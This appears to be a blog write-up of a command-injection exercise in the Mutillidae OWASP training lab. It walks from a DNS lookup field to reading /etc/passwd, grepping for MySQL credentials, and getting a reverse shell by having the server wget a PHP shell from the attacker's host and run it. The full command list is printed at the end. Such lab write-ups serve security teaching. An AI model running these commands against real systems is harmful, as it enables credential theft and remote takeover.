In this post, we covered command injection vulnerability and performed a practical demonstration using Mutillidae OWASP Lab.
Command injection is widely spread and dangerous vulnerability that allows an attacker to remotely execute system commands that could lead to negative impacts ranging from data leak to full denial of service.
What’s Command Injection?
So, what is command injection? It’s a vulnerability that pops up when a web application doesn’t properly clean up the input it gets from users. Think about a search box or a comment section on a website. If an attacker can sneak in their own commands along with their input, they can trick the server into running those commands. It’s like telling the server to do one thing, but secretly making it do something else entirely.
My Step-by-Step Attack
In my demonstration, I used a DNS lookup tool in the lab to show how this works. Here’s how I went from a simple lookup to owning the whole system:
- Finding My Bearings: I started by appending some basic commands to the DNS lookup. I used
pwd
to see what directory I was in andcat /etc/passwd
to see if I could read the system’s password file. Both worked, which confirmed the vulnerability. - Digging for Gold (MySQL Credentials): My next goal was to find the database credentials. I used the
find
command to search for any PHP files that contained the words “password” or “user,” hoping to find a configuration file. This led me straight to the MySQL username (“root”) and password (“very level of application”). - The Grand Finale: Getting a Shell: This is the ultimate goal for any attacker. I wanted to get a full, interactive shell on the server.
- First, I set up a Netcat listener on my own machine. This is like opening a door and waiting for a connection to come through.
- Next, I used the command injection vulnerability to make the server download a PHP reverse shell from my machine and then run it.
- As soon as the server ran the script, it connected back to my listener, and just like that, I had a shell! I could now run commands like
whoami
andls
as if I were logged directly into the server.
Owning the System
With a shell on the machine, it was game over. I demonstrated how I could navigate the entire file system, read any file I wanted, and basically do anything I pleased. The system was now completely under my control. This really shows how a seemingly small flaw can lead to a total compromise.
Technical Commands I Used
Here’s a list of the commands I used during the attack:
pwd
cat /etc/passwd
find . -name "*.php" -exec grep -i "password" {} \;
find . -name "*.php" -exec grep -i "user\|login" {} \;
cat /var/www/html/mutillidae/config.inc
nc -lvp 4444
wget http://192.168.1.104/shell.php -O /tmp/shell.php && php /tmp/shell.php
id
ls
cd ..
cd /
Video Demonstration